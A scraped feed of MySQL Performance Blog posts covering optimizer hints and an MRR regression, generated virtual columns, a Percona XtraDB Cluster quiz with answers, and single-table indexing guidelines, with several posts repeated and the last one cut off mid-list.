So we can specify custom QB_NAME for any subquery and specify optimizer hint only for this context.

To conclude this quick overview I want to show a practical example of when query hints are really needed. Last week I worked on an issue where a customer upgraded from MySQL version 5.5 to 5.6 and found some of their queries started to work slower than before. I wrote an answer which could sound funny, but still remains correct: “One of the reasons for such behavior is optimizer  improvements. While they all are made for better performance, some queries – optimized for older versions – can start working slower than before.”

To demonstrate a public example of such a query I will use my favorite source of information: MySQL Community Bugs Database. In a search for Optimizer regression bugs that are still not fixed we can find bug #68919 demonstrating regression in case the MRR algorithm is used for queries with LIMIT. In run queries, shown in the bug report, we will see a huge difference:

mysql> SELECT * FROM t1 WHERE i1>=42 AND i2<=42 LIMIT 1; +----+----+----+----+ | pk | i1 | i2 | i3 | +----+----+----+----+ | 42 | 42 | 42 | 42 | +----+----+----+----+ 1 row in set (6.88 sec) mysql> explain SELECT * FROM t1 WHERE i1>=42 AND i2<=42 LIMIT 1; +----+-------------+-------+------------+-------+---------------+------+---------+------+---------+----------+----------------------------------+ | id | select_type | table | partitions | type | possible_keys | key | key_len | ref | rows | filtered | Extra | +----+-------------+-------+------------+-------+---------------+------+---------+------+---------+----------+----------------------------------+ | 1 | SIMPLE | t1 | NULL | range | idx | idx | 4 | NULL | 9999958 | 33.33 | Using index condition; Using MRR | +----+-------------+-------+------------+-------+---------------+------+---------+------+---------+----------+----------------------------------+ 1 row in set, 1 warning (0.00 sec) mysql> SELECT /*+ NO_MRR(t1) */ * FROM t1 WHERE i1>=42 AND i2<=42 LIMIT 1; +----+----+----+----+ | pk | i1 | i2 | i3 | +----+----+----+----+ | 42 | 42 | 42 | 42 | +----+----+----+----+ 1 row in set (0.00 sec)

With MRR query execution takes 6.88 seconds and 0 if MRR is not used! But the bug report itself suggests usingoptimizer_switch="mrr=off";as a workaround. And this will work perfectly well if you are OK to runSET optimizer_switch="mrr=off";every time you are running a query which will take advantage of having it OFF. With optimizer hints you can have one or another algorithm to be ON for particular table in the query and OFF for another one. I, again, took quite an artificial example, but it demonstrates the method:

mysql> explain select /*+ MRR(dept_emp) */ * from dept_emp where to_date in (select /*+ NO_MRR(salaries)*/ to_date from salaries where salary >40000 and salary <45000) and emp_no >10100 and emp_no < 30200 and dept_no in ('d005', 'd006','d007'); +----+--------------+-------------+------------+--------+------------------------+------------+---------+----------------------------+---------+----------+-----------------------------------------------+ | id | select_type | table | partitions | type | possible_keys | key | key_len | ref | rows | filtered | Extra | +----+--------------+-------------+------------+--------+------------------------+------------+---------+----------------------------+---------+----------+-----------------------------------------------+ | 1 | SIMPLE | dept_emp | NULL | range | PRIMARY,emp_no,dept_no | dept_no | 8 | NULL | 10578 | 100.00 | Using index condition; Using where; Using MRR | | 1 | SIMPLE | <subquery2> | NULL | eq_ref | <auto_key> | <auto_key> | 3 | employees.dept_emp.to_date | 1 | 100.00 | NULL | | 2 | MATERIALIZED | salaries | NULL | ALL | salary | NULL | NULL | NULL | 2838533 | 17.88 | Using where | +----+--------------+-------------+------------+--------+------------------------+------------+---------+----------------------------+---------+----------+-----------------------------------------------+ 3 rows in set, 1 warning (0.00 sec)

 

The post Optimizer hints in MySQL 5.7.7 – The missed manual appeared first on MySQL Performance Blog.

Generated (Virtual) Columns in MySQL 5.7 (labs)

April 29, 2015 - 3:00am

About 2 weeks ago Oracle published the MySQL 5.7.7-labs-json version which includes a very interesting feature called “Generated columns” (also know as Virtual or Computed columns). MariaDB has a similar feature as well: Virtual (Computed) Columns.

The idea is very simple: if we store a column

`FlightDate` date

in our table we may want to filter or group by year(FlightDate), month(FlightDate) or even dayofweek(FlightDate). The “brute-force” approach: use the above Date and Time MySQL functions in the query; however it will prevent MySQL from using an index (see below). Generated columns will allow you to declare a “Virtual”, non-stored column which is computed based on the existing field; you can then add index on that virtual column, so the query will use that index.

Here is the original example:

CREATE TABLE `ontime` ( `id` int(11) NOT NULL AUTO_INCREMENT, `FlightDate` date DEFAULT NULL, `Carrier` char(2) DEFAULT NULL, `OriginAirportID` int(11) DEFAULT NULL, `OriginCityName` varchar(100) DEFAULT NULL, `OriginState` char(2) DEFAULT NULL, `DestAirportID` int(11) DEFAULT NULL, `DestCityName` varchar(100) DEFAULT NULL, `DestState` char(2) DEFAULT NULL, `DepDelayMinutes` int(11) DEFAULT NULL, `ArrDelayMinutes` int(11) DEFAULT NULL, `Cancelled` tinyint(4) DEFAULT NULL, `CancellationCode` char(1) DEFAULT NULL, `Diverted` tinyint(4) DEFAULT NULL, PRIMARY KEY (`id`), KEY `FlightDate` (`FlightDate`) ) ENGINE=InnoDB

Now I want to find all flights on Sundays (in 2013) and group by airline.

mysql> EXPLAIN SELECT carrier, count(*) FROM ontime_sm WHERE dayofweek(FlightDate) = 7 group by carrier *************************** 1. row *************************** id: 1 select_type: SIMPLE table: ontime_sm type: ALL possible_keys: NULL key: NULL key_len: NULL ref: NULL rows: 151253427 Extra: Using where; Using temporary; Using filesort Results: 32 rows in set (1 min 57.93 sec)

The problem here is: MySQL will not be able to use index when you use a function which will “extract” something from the column. The standard approach is to “materialize” the column:

ALTER TABLE ontime_sm ADD Flight_dayofweek tinyint NOT NULL;

Then we will need to load data into that by running “UPDATE ontime_sm SET Flight_dayofweek = dayofweek(flight_date)”. After that we will also need to change the application to support that additional column or use a trigger to update the column. Here is the trigger example:

CREATE DEFINER = CURRENT_USER TRIGGER ontime_insert BEFORE INSERT ON ontime_sm_triggers FOR EACH ROW SET NEW.Flight_dayofweek = dayofweek(NEW.FlightDate);

One problem with the trigger is that it is slow. In my simple example it took almost 2x slower to “copy” the table using “insert into ontime_sm_copy select * from ontime_sm” when the trigger was on.

The Generated Columns from MySQL 5.7.7-labs-json version (only this version supports it on the time of writing) solves this problem. Here is the example which demonstrate its use:

CREATE TABLE `ontime_sm_virtual` ( `id` int(11) NOT NULL AUTO_INCREMENT, `FlightDate` date DEFAULT NULL, `Carrier` char(2) DEFAULT NULL, `OriginAirportID` int(11) DEFAULT NULL, `OriginCityName` varchar(100) DEFAULT NULL, `OriginState` char(2) DEFAULT NULL, `DestAirportID` int(11) DEFAULT NULL, `DestCityName` varchar(100) DEFAULT NULL, `DestState` char(2) DEFAULT NULL, `DepDelayMinutes` int(11) DEFAULT NULL, `ArrDelayMinutes` int(11) DEFAULT NULL, `Cancelled` tinyint(4) DEFAULT NULL, `CancellationCode` char(1) DEFAULT NULL, `Diverted` tinyint(4) DEFAULT NULL, `CRSElapsedTime` int(11) DEFAULT NULL, `ActualElapsedTime` int(11) DEFAULT NULL, `AirTime` int(11) DEFAULT NULL, `Flights` int(11) DEFAULT NULL, `Distance` int(11) DEFAULT NULL, `Flight_dayofweek` tinyint(4) GENERATED ALWAYS AS (dayofweek(FlightDate)) VIRTUAL, PRIMARY KEY (`id`), KEY `Flight_dayofweek` (`Flight_dayofweek`), ) ENGINE=InnoDB

Here we add Flight_dayofweek tinyint(4) GENERATED ALWAYS AS (dayofweek(FlightDate)) VIRTUAL column and index it.

Now MySQL can use this index:

mysql> EXPLAIN SELECT carrier, count(*) FROM ontime_sm_virtual WHERE Flight_dayofweek = 7 group by carrier *************************** 1. row *************************** id: 1 select_type: SIMPLE table: ontime_sm_virtual partitions: NULL type: ref possible_keys: Flight_dayofweek key: Flight_dayofweek key_len: 2 ref: const rows: 165409 filtered: 100.00 Extra: Using where; Using temporary; Using filesort

To further increase performance of this query we want to add a combined index on (Flight_dayofweek, carrier) so MySQL will avoid creating temporary table. However it is not currently supported:

mysql> alter table ontime_sm_virtual add key comb(Flight_dayofweek, carrier); ERROR 3105 (HY000): 'Virtual generated column combines with other columns to be indexed together' is not supported for generated columns.

We can add an index on 2 generated columns thou, which is good. So a trick here will be to create a “dummy” virtual column on “carrier” and index 2 of those columns:

mysql> alter table ontime_sm_virtual add Carrier_virtual char(2) GENERATED ALWAYS AS (Carrier) VIRTUAL; Query OK, 0 rows affected (0.43 sec) Records: 0 Duplicates: 0 Warnings: 0 mysql> alter table ontime_sm_virtual add key comb(Flight_dayofweek, Carrier_virtual); Query OK, 999999 rows affected (36.79 sec) Records: 999999 Duplicates: 0 Warnings: 0 mysql> EXPLAIN SELECT Carrier_virtual, count(*) FROM ontime_sm_virtual WHERE Flight_dayofweek = 7 group by Carrier_virtual *************************** 1. row *************************** id: 1 select_type: SIMPLE table: ontime_sm_virtual partitions: NULL type: ref possible_keys: Flight_dayofweek,comb key: comb key_len: 2 ref: const rows: 141223 filtered: 100.00 Extra: Using where; Using index

Now MySQL will use an index and completely avoid the filesort.

The last, but not the least: loading data to the table with generated columns is significantly faster compared to loading it into the same table with triggers:

mysql> insert into ontime_sm_triggers (id, YearD, FlightDate, Carrier, OriginAirportID, OriginCityName, OriginState, DestAirportID, DestCityName, DestState, DepDelayMinutes, ArrDelayMinutes, Cancelled, CancellationCode,Diverted, CRSElapsedTime, ActualElapsedTime, AirTime, Flights, Distance) select * from ontime_sm; Query OK, 999999 rows affected (27.86 sec) Records: 999999 Duplicates: 0 Warnings: 0 mysql> insert into ontime_sm_virtual (id, YearD, FlightDate, Carrier, OriginAirportID, OriginCityName, OriginState, DestAirportID, DestCityName, DestState, DepDelayMinutes, ArrDelayMinutes, Cancelled, CancellationCode,Diverted, CRSElapsedTime, ActualElapsedTime, AirTime, Flights, Distance) select * from ontime_sm; Query OK, 999999 rows affected (16.29 sec) Records: 999999 Duplicates: 0 Warnings: 0

Now the big disappointment: all operations with generated columns are not online right now.

mysql> alter table ontime_sm_virtual add Flight_year year GENERATED ALWAYS AS (year(FlightDate)) VIRTUAL, add key (Flight_year), lock=NONE; ERROR 1846 (0A000): LOCK=NONE is not supported. Reason: '%s' is not supported for generated columns.. Try LOCK=SHARED. mysql> alter table ontime_sm_virtual add key (Flight_year), lock=NONE; ERROR 1846 (0A000): LOCK=NONE is not supported. Reason: '%s' is not supported for generated columns.. Try LOCK=SHARED.

I hope it will be fixed in the future releases.

Conclusion

Generated columns feature is very useful. Imagine an ability to add a column + index for any “logical” piece of data without actually duplicating the data. And this can be any function: date/time/calendar, text (extract(), reverse(), metaphone()) or anything else. I hope this feature will be available in MySQL 5.7 GA. Finally, I wish adding a generated column and index can be online (it is not right now).

More information:

The post Generated (Virtual) Columns in MySQL 5.7 (labs) appeared first on MySQL Performance Blog.

Generated (Virtual) Columns in MySQL 5.7 (labs)

April 29, 2015 - 3:00am

About 2 weeks ago Oracle published the MySQL 5.7.7-labs-json version which includes a very interesting feature called “Generated columns” (also know as Virtual or Computed columns). MariaDB has a similar feature as well: Virtual (Computed) Columns.

The idea is very simple: if we store a column

`FlightDate` date

in our table we may want to filter or group by year(FlightDate), month(FlightDate) or even dayofweek(FlightDate). The “brute-force” approach: use the above Date and Time MySQL functions in the query; however it will prevent MySQL from using an index (see below). Generated columns will allow you to declare a “Virtual”, non-stored column which is computed based on the existing field; you can then add index on that virtual column, so the query will use that index.

Here is the original example:

CREATE TABLE `ontime` ( `id` int(11) NOT NULL AUTO_INCREMENT, `FlightDate` date DEFAULT NULL, `Carrier` char(2) DEFAULT NULL, `OriginAirportID` int(11) DEFAULT NULL, `OriginCityName` varchar(100) DEFAULT NULL, `OriginState` char(2) DEFAULT NULL, `DestAirportID` int(11) DEFAULT NULL, `DestCityName` varchar(100) DEFAULT NULL, `DestState` char(2) DEFAULT NULL, `DepDelayMinutes` int(11) DEFAULT NULL, `ArrDelayMinutes` int(11) DEFAULT NULL, `Cancelled` tinyint(4) DEFAULT NULL, `CancellationCode` char(1) DEFAULT NULL, `Diverted` tinyint(4) DEFAULT NULL, PRIMARY KEY (`id`), KEY `FlightDate` (`FlightDate`) ) ENGINE=InnoDB

Now I want to find all flights on Sundays (in 2013) and group by airline.

mysql> EXPLAIN SELECT carrier, count(*) FROM ontime_sm WHERE dayofweek(FlightDate) = 7 group by carrier *************************** 1. row *************************** id: 1 select_type: SIMPLE table: ontime_sm type: ALL possible_keys: NULL key: NULL key_len: NULL ref: NULL rows: 151253427 Extra: Using where; Using temporary; Using filesort Results: 32 rows in set (1 min 57.93 sec)

The problem here is: MySQL will not be able to use index when you use a function which will “extract” something from the column. The standard approach is to “materialize” the column:

ALTER TABLE ontime_sm ADD Flight_dayofweek tinyint NOT NULL;

Then we will need to load data into that by running “UPDATE ontime_sm SET Flight_dayofweek = dayofweek(flight_date)”. After that we will also need to change the application to support that additional column or use a trigger to update the column. Here is the trigger example:

CREATE DEFINER = CURRENT_USER TRIGGER ontime_insert BEFORE INSERT ON ontime_sm_triggers FOR EACH ROW SET NEW.Flight_dayofweek = dayofweek(NEW.FlightDate);

One problem with the trigger is that it is slow. In my simple example it took almost 2x slower to “copy” the table using “insert into ontime_sm_copy select * from ontime_sm” when the trigger was on.

The Generated Columns from MySQL 5.7.7-labs-json version (only this version supports it on the time of writing) solves this problem. Here is the example which demonstrate its use:

CREATE TABLE `ontime_sm_virtual` ( `id` int(11) NOT NULL AUTO_INCREMENT, `FlightDate` date DEFAULT NULL, `Carrier` char(2) DEFAULT NULL, `OriginAirportID` int(11) DEFAULT NULL, `OriginCityName` varchar(100) DEFAULT NULL, `OriginState` char(2) DEFAULT NULL, `DestAirportID` int(11) DEFAULT NULL, `DestCityName` varchar(100) DEFAULT NULL, `DestState` char(2) DEFAULT NULL, `DepDelayMinutes` int(11) DEFAULT NULL, `ArrDelayMinutes` int(11) DEFAULT NULL, `Cancelled` tinyint(4) DEFAULT NULL, `CancellationCode` char(1) DEFAULT NULL, `Diverted` tinyint(4) DEFAULT NULL, `CRSElapsedTime` int(11) DEFAULT NULL, `ActualElapsedTime` int(11) DEFAULT NULL, `AirTime` int(11) DEFAULT NULL, `Flights` int(11) DEFAULT NULL, `Distance` int(11) DEFAULT NULL, `Flight_dayofweek` tinyint(4) GENERATED ALWAYS AS (dayofweek(FlightDate)) VIRTUAL, PRIMARY KEY (`id`), KEY `Flight_dayofweek` (`Flight_dayofweek`), ) ENGINE=InnoDB

Here we add Flight_dayofweek tinyint(4) GENERATED ALWAYS AS (dayofweek(FlightDate)) VIRTUAL column and index it.

Now MySQL can use this index:

mysql> EXPLAIN SELECT carrier, count(*) FROM ontime_sm_virtual WHERE Flight_dayofweek = 7 group by carrier *************************** 1. row *************************** id: 1 select_type: SIMPLE table: ontime_sm_virtual partitions: NULL type: ref possible_keys: Flight_dayofweek key: Flight_dayofweek key_len: 2 ref: const rows: 165409 filtered: 100.00 Extra: Using where; Using temporary; Using filesort

To further increase performance of this query we want to add a combined index on (Flight_dayofweek, carrier) so MySQL will avoid creating temporary table. However it is not currently supported:

mysql> alter table ontime_sm_virtual add key comb(Flight_dayofweek, carrier); ERROR 3105 (HY000): 'Virtual generated column combines with other columns to be indexed together' is not supported for generated columns.

We can add an index on 2 generated columns thou, which is good. So a trick here will be to create a “dummy” virtual column on “carrier” and index 2 of those columns:

mysql> alter table ontime_sm_virtual add Carrier_virtual char(2) GENERATED ALWAYS AS (Carrier) VIRTUAL; Query OK, 0 rows affected (0.43 sec) Records: 0 Duplicates: 0 Warnings: 0 mysql> alter table ontime_sm_virtual add key comb(Flight_dayofweek, Carrier_virtual); Query OK, 999999 rows affected (36.79 sec) Records: 999999 Duplicates: 0 Warnings: 0 mysql> EXPLAIN SELECT Carrier_virtual, count(*) FROM ontime_sm_virtual WHERE Flight_dayofweek = 7 group by Carrier_virtual *************************** 1. row *************************** id: 1 select_type: SIMPLE table: ontime_sm_virtual partitions: NULL type: ref possible_keys: Flight_dayofweek,comb key: comb key_len: 2 ref: const rows: 141223 filtered: 100.00 Extra: Using where; Using index

Now MySQL will use an index and completely avoid the filesort.

The last, but not the least: loading data to the table with generated columns is significantly faster compared to loading it into the same table with triggers:

mysql> insert into ontime_sm_triggers (id, YearD, FlightDate, Carrier, OriginAirportID, OriginCityName, OriginState, DestAirportID, DestCityName, DestState, DepDelayMinutes, ArrDelayMinutes, Cancelled, CancellationCode,Diverted, CRSElapsedTime, ActualElapsedTime, AirTime, Flights, Distance) select * from ontime_sm; Query OK, 999999 rows affected (27.86 sec) Records: 999999 Duplicates: 0 Warnings: 0 mysql> insert into ontime_sm_virtual (id, YearD, FlightDate, Carrier, OriginAirportID, OriginCityName, OriginState, DestAirportID, DestCityName, DestState, DepDelayMinutes, ArrDelayMinutes, Cancelled, CancellationCode,Diverted, CRSElapsedTime, ActualElapsedTime, AirTime, Flights, Distance) select * from ontime_sm; Query OK, 999999 rows affected (16.29 sec) Records: 999999 Duplicates: 0 Warnings: 0

Now the big disappointment: all operations with generated columns are not online right now.

mysql> alter table ontime_sm_virtual add Flight_year year GENERATED ALWAYS AS (year(FlightDate)) VIRTUAL, add key (Flight_year), lock=NONE; ERROR 1846 (0A000): LOCK=NONE is not supported. Reason: '%s' is not supported for generated columns.. Try LOCK=SHARED. mysql> alter table ontime_sm_virtual add key (Flight_year), lock=NONE; ERROR 1846 (0A000): LOCK=NONE is not supported. Reason: '%s' is not supported for generated columns.. Try LOCK=SHARED.

I hope it will be fixed in the future releases.

Conclusion

Generated columns feature is very useful. Imagine an ability to add a column + index for any “logical” piece of data without actually duplicating the data. And this can be any function: date/time/calendar, text (extract(), reverse(), metaphone()) or anything else. I hope this feature will be available in MySQL 5.7 GA. Finally, I wish adding a generated column and index can be online (it is not right now).

More information:

The post Generated (Virtual) Columns in MySQL 5.7 (labs) appeared first on MySQL Performance Blog.

Test your knowledge: Percona XtraDB Cluster (PXC) quiz

April 28, 2015 - 3:00am

I often talk with people who are very interested in the features of Percona XtraDB Cluster (PXC) such as synchronous and parallel replication, multi-node writing and high availability. However some get confused when operating a real PXC cluster because they do not fully realize the implications of these features. So here is a fun way to test your PXC knowledge: try to solve these 12 questions related to PXC! (you will find the answers at the end of the post.)

Workload

1. With Galera 3.x, support for MyISAM is experimental. When can we expect to have full MyISAM support?
a. This will never happen as Galera is designed for transactional storage engines.
b. This is planned for Galera 4.0.

2. Why aren’t all workloads a good fit for PXC?
a. Execution plans can change compared to a regular MySQL server, so performance is sometimes not as good as with a regular MySQL server.
b. Large transactions and write hotspots can create performance issues with Galera.

3. For workloads with a write hot spot, writing on all nodes to distribute the load is a good way to solve the issue.
a. True
b. False

4. Optimistic locking is used in a PXC cluster. What does it mean?
a. When a transaction starts on a node, locks are only set on this node but never on the remote nodes.
b. When a transaction starts on a node, locks are only set on the remote nodes but never on the local node.
c. Write conflict detection is built-in, so there is no need to set locks at all.

Replication

5. Galera implements virtually synchronous replication. What does it mean?
a. A transaction is first committed locally, and then it is committed on all remote nodes at the same exact point in time.
b. Transactions are replicated synchronously, but they are applied asynchronously on remote nodes.
c. Replication is actually asynchronous, but as it is faster than MySQL replication, so marketing decided to name it ‘virtually synchronous’.

6. When the receive queue of a node exceeds a threshold, the node sends flow control messages. What is the goal of these flow control messages?
a. They instruct the other nodes that they must pause processing writes for some time, to allow the slow node to catch up.
b. The other nodes trigger an election and if they have quorum they will evict the slow node.
c. The messages can be used by monitoring systems to detect a slow node, but they have no effect.

7. When you change the state of a node to Donor/Desynced, what happens?
a. The node stops receiving writes from the other nodes.
b. The node intentionally replicates writes at a slower pace, this is roughly equivalent to a delayed replica when using MySQL replication.
c. The node keeps working as usual, but it will not send flow control messages if its receive queue becomes large.

High Availability

8. You should always use an odd number of nodes, because with an even number (say 4 or 6), the failure of one node will create a split-brain situation.
a. True
b. False

9. With a 3-node cluster, what happens if you gracefully stop 2 nodes?
a. The remaining node can process queries normally.
b. The remaining node is up but it stops processing queries as it does not have quorum.

Operations

10. If a node has been stopped for less than 5 minutes, it will always perform an IST.
a. True: SST is only performed after a node crash, never after a regular shutdown.
b. False: it depends on the gcache size.

11. Even with datasets under 5GB, the preferred SST method is xtrabackup-v2 not mysqldump.
a. True
b. False

12. Migration from a master-slave setup to a PXC cluster always involves a downtime to dump and reload the database.
a. True, because MySQL replication and Galera replication are incompatible.
b. False, one node of the PXC cluster can be set up as an asynchronous replica of the old master.

Solutions

1. a      2. b      3. b
4. a      5. b      6. a
7. c      8. b      9. a
10. b    11. a    12. b

The post Test your knowledge: Percona XtraDB Cluster (PXC) quiz appeared first on MySQL Performance Blog.

Test your knowledge: Percona XtraDB Cluster (PXC) quiz

April 28, 2015 - 3:00am

I often talk with people who are very interested in the features of Percona XtraDB Cluster (PXC) such as synchronous and parallel replication, multi-node writing and high availability. However some get confused when operating a real PXC cluster because they do not fully realize the implications of these features. So here is a fun way to test your PXC knowledge: try to solve these 12 questions related to PXC! (you will find the answers at the end of the post.)

Workload

1. With Galera 3.x, support for MyISAM is experimental. When can we expect to have full MyISAM support?
a. This will never happen as Galera is designed for transactional storage engines.
b. This is planned for Galera 4.0.

2. Why aren’t all workloads a good fit for PXC?
a. Execution plans can change compared to a regular MySQL server, so performance is sometimes not as good as with a regular MySQL server.
b. Large transactions and write hotspots can create performance issues with Galera.

3. For workloads with a write hot spot, writing on all nodes to distribute the load is a good way to solve the issue.
a. True
b. False

4. Optimistic locking is used in a PXC cluster. What does it mean?
a. When a transaction starts on a node, locks are only set on this node but never on the remote nodes.
b. When a transaction starts on a node, locks are only set on the remote nodes but never on the local node.
c. Write conflict detection is built-in, so there is no need to set locks at all.

Replication

5. Galera implements virtually synchronous replication. What does it mean?
a. A transaction is first committed locally, and then it is committed on all remote nodes at the same exact point in time.
b. Transactions are replicated synchronously, but they are applied asynchronously on remote nodes.
c. Replication is actually asynchronous, but as it is faster than MySQL replication, so marketing decided to name it ‘virtually synchronous’.

6. When the receive queue of a node exceeds a threshold, the node sends flow control messages. What is the goal of these flow control messages?
a. They instruct the other nodes that they must pause processing writes for some time, to allow the slow node to catch up.
b. The other nodes trigger an election and if they have quorum they will evict the slow node.
c. The messages can be used by monitoring systems to detect a slow node, but they have no effect.

7. When you change the state of a node to Donor/Desynced, what happens?
a. The node stops receiving writes from the other nodes.
b. The node intentionally replicates writes at a slower pace, this is roughly equivalent to a delayed replica when using MySQL replication.
c. The node keeps working as usual, but it will not send flow control messages if its receive queue becomes large.

High Availability

8. You should always use an odd number of nodes, because with an even number (say 4 or 6), the failure of one node will create a split-brain situation.
a. True
b. False

9. With a 3-node cluster, what happens if you gracefully stop 2 nodes?
a. The remaining node can process queries normally.
b. The remaining node is up but it stops processing queries as it does not have quorum.

Operations

10. If a node has been stopped for less than 5 minutes, it will always perform an IST.
a. True: SST is only performed after a node crash, never after a regular shutdown.
b. False: it depends on the gcache size.

11. Even with datasets under 5GB, the preferred SST method is xtrabackup-v2 not mysqldump.
a. True
b. False

12. Migration from a master-slave setup to a PXC cluster always involves a downtime to dump and reload the database.
a. True, because MySQL replication and Galera replication are incompatible.
b. False, one node of the PXC cluster can be set up as an asynchronous replica of the old master.

Solutions

1. a      2. b      3. b
4. a      5. b      6. a
7. c      8. b      9. a
10. b    11. a    12. b

The post Test your knowledge: Percona XtraDB Cluster (PXC) quiz appeared first on MySQL Performance Blog.

Indexing 101: Optimizing MySQL queries on a single table

April 27, 2015 - 3:00am

I have recently seen several cases when performance for MySQL queries on a single table was terrible. The reason was simple: the wrong indexes were added and so the execution plan was poor. Here are guidelines to help you optimize various kinds of single-table queries.

Disclaimer: I will be presenting general guidelines and I do not intend to cover all scenarios. I am pretty confident that you can find examples where what I am writing does not work, but I am also confident that it will help you most of the time. Also I will not discuss features you can find in MySQL 5.6+ like Index Condition Pushdown to keep things simple. Be aware that such features can actually make a significant difference in query response time (for good or for bad).

What an index can do for you

An index can perform up to 3 actions: filter, sort/group and cover. While the first 2 actions are self-explanatory, not everyone may know what a ‘covering index’ is. Actually that’s very easy. The general workflow for a basic query is:
1. Use an index to find matching records and get the pointers to data.
2. Use the pointers to the corresponding data.
3. Return records

When a covering index can be used, the index already covers all fields requested in the query, so step #2 can be skipped and the workflow is now:
1. Use an index to find matching records
2. Return records

In many cases, indexes are small and can fit in memory while data is large and does not fit in memory: by using a covering index, you can avoid lots of disk operations and performance can be order of magnitudes better.
Let’s now look at different common scenarios.

Single equality

This is the most basic scenario:

SELECT * FROM t WHERE c = 100

The idea is of course to add an index on (c). However note that if the criteria is not selective enough, the optimizer may choose to perform a full table scan that will certainly be more efficient.
Also note that a frequent variation of this query is when you only select a small subset of fields instead of all fields:

SELECT c1, c2 FROM t WHERE c = 100

Here it could make sense to create an index on (c, c1, c2) because it will be a covering index. Do not create an index on (c1, c2, c)! It will still be covering but it will not be usable for filtering (remember that you can only use a left-most prefix of an index to filter).

Multiple equalities

SELECT * FROM t WHERE c = 100 and d = 'xyz'

It is also very easy to optimize: just add an index on (c, d) or (d, c).

The main mistake here is to add 2 indexes: one on (c) and one on (d). Granted, MySQL is able to use both indexes with the index_merge algorithm, but it is almost always a very bad option.

Equality and inequality

SELECT * FROM t WHERE c > 100 and d = 'xyz'

Here we must be careful because as long as we are using a column with an inequality, this will prevent us from using further columns in the index.

Therefore if we create an index on (d, c), we will be able to filter both on c and d, this is good.
But if we create an index on (c, d), we will only be filtering on c, which is less efficient.

So unlike the situation when you have equalities, order of columns matters when inequalities are used.

Multiple inequalities

SELECT * FROM t WHERE c > 100 and b < 10 and d = 'xyz'

As we have 2 inequalities, we already know that we will not be able to filter on both conditions (*). So we have to make a decision: will we filter on (d, b) or on (d, c)?

It is not possible to tell which option is better without looking at the data: simply choose the column where the inequality is the most selective. The main point is that you must put the column(s) with an equality first.

(*) Actually there is a way to ‘filter’ on both inequalites: partition on b and add an index on (d, c) or partition on c and add an index on (d, b). The details are out of the scope of this post but it might be an option for some situations.

Equalities and sort

SELECT * FROM t WHERE c = 100 and d = 'xyz' ORDER BY b

As mentioned in the first paragraph, an index can filter and sort so this query is easy to optimize. However like for inequalities, we must carefully choose the order of the columns in the index: the rule is that we will filter first, and then sort.

With that in mind, it is easy to know that (c, d, b) or (d, c, b) will be good indexes while (b, c, d) or (b, d, c) are not as good (they will sort but not filter).

And if we have:

SELECT c1, c2 FROM t WHERE c = 100 and d = 'xyz' ORDER BY b

We can create a super efficient index that will filter, sort and be covering: (c, d, b, c1, c2).

Inequality and sort

We have 2 main variations here. The first one is:

SELECT * FROM t WHERE c > 100 and d = 'xyz' ORDER BY b

Two options look reasonable in this case:
1. filter on d and sort by b.
2. filter on d and c.

Which strategy is more efficient? It will depend on your data, so you will have to experiment.

The second variation is:

SELECT * FROM t WHERE c > 100 ORDER BY b

This time we have no equality so we have to choose between filtering and sorting. Most likely you will choose filtering.

Conclusion

Not all cases have been covered in this post but you can already see that in some cases you will create poor MySQL indexes if you are not careful. In a future post, I will present a case that can look confusing at first sight but which is easy to understand if you already know everything mentioned here.

The post Indexing 101: Optimizing MySQL queries on a single table appeared first on MySQL Performance Blog.

Indexing 101: Optimizing MySQL queries on a single table

April 27, 2015 - 3:00am

I have recently seen several cases when performance for MySQL queries on a single table was terrible. The reason was simple: the wrong indexes were added and so the execution plan was poor. Here are guidelines to help you optimize various kinds of single-table queries.

Disclaimer: I will be presenting general guidelines and I do not intend to cover all scenarios. I am pretty confident that you can find examples where what I am writing does not work, but I am also confident that it will help you most of the time. Also I will not discuss features you can find in MySQL 5.6+ like Index Condition Pushdown to keep things simple. Be aware that such features can actually make a significant difference in query response time (for good or for bad).

What an index can do for you

An index can perform up to 3 actions: filter, sort/group and cover. While the first 2 actions are self-explanatory, not everyone may know what a ‘covering index’ is. Actually that’s very easy. The general workflow for a basic query is:
1. Use an index to find matching records and get the pointers to data.
2. Use the pointers to the corresponding data.
3. Return records

When a covering index can be used, the index already covers all fields requested in the query, so step #2 can be skipped and the workflow is now:
1. Use an index to find matching records
2. Return records

In many cases, indexes are small and can fit in memory while data is large and does not fit in memory: by using a covering index, you can avoid lots of disk operations and performance can be order of magnitudes better.
Let’s now look at different common scenarios.

Single equality

This is the most basic scenario:

SELECT * FROM t WHERE c = 100

The idea is of course to add an index on (c). However note that if the criteria is not selective enough, the optimizer may choose to perform a full table scan that will certainly be more efficient.
Also note that a frequent variation of this query is when you only select a small subset of fields instead of all fields:

SELECT c1, c2 FROM t WHERE c = 100

Here it could make sense to create an index on (c, c1, c2) because it will be a covering index. Do not create an index on (c1, c2, c)! It will still be covering but it will not be usable for filtering (remember that you can only use a left-most prefix of an index to filter).

Multiple equalities

SELECT * FROM t WHERE c = 100 and d = 'xyz'

It is also very easy to optimize: just add an index on (c, d) or (d, c).

The main mistake here is to add 2 indexes: one on (c) and one on (d). Granted, MySQL is able to use both indexes with the index_merge algorithm, but it is almost always a very bad option.

Equality and inequality

SELECT * FROM t WHERE c > 100 and d = 'xyz'

Here we must be careful because as long as we are using a column with an inequality, this will prevent us from using further columns in the index.

Therefore if we create an index on (d, c), we will be able to filter both on c and d, this is good.
But if we create an index on (c, d), we will only be filtering on c, which is less efficient.

So unlike the situation when you have equalities, order of columns matters when inequalities are used.

Multiple inequalities

SELECT * FROM t WHERE c > 100 and b < 10 and d = 'xyz'

As we have 2 inequalities, we already know that we will not be able to filter on both conditions (*). So we have to make a decision: will we filter on (d, b) or on (d, c)?

It is not possible to tell which option is better without looking at the data: simply choose the column where the inequality is the most selective. The main point is that you must put the column(s) with an equality first.

(*) Actually there is a way to ‘filter’ on both inequalites: partition on b and add an index on (d, c) or partition on c and add an index on (d, b). The details are out of the scope of this post but it might be an option for some situations.

Equalities and sort

SELECT * FROM t WHERE c = 100 and d = 'xyz' ORDER BY b

As mentioned in the first paragraph, an index can filter and sort so this query is easy to optimize. However like for inequalities, we must carefully choose the order of the columns in the index: the rule is that we will filter first, and then sort.

With that in mind, it is easy to know that (c, d, b) or (d, c, b) will be good indexes while (b, c, d) or (b, d, c) are not as good (they will sort but not filter).

And if we have:

SELECT c1, c2 FROM t WHERE c = 100 and d = 'xyz' ORDER BY b

We can create a super efficient index that will filter, sort and be covering: (c, d, b, c1, c2).

Inequality and sort

We have 2 main variations here. The first one is:

SELECT * FROM t WHERE c > 100 and d = 'xyz' ORDER BY b

Two options look reasonable in this case:
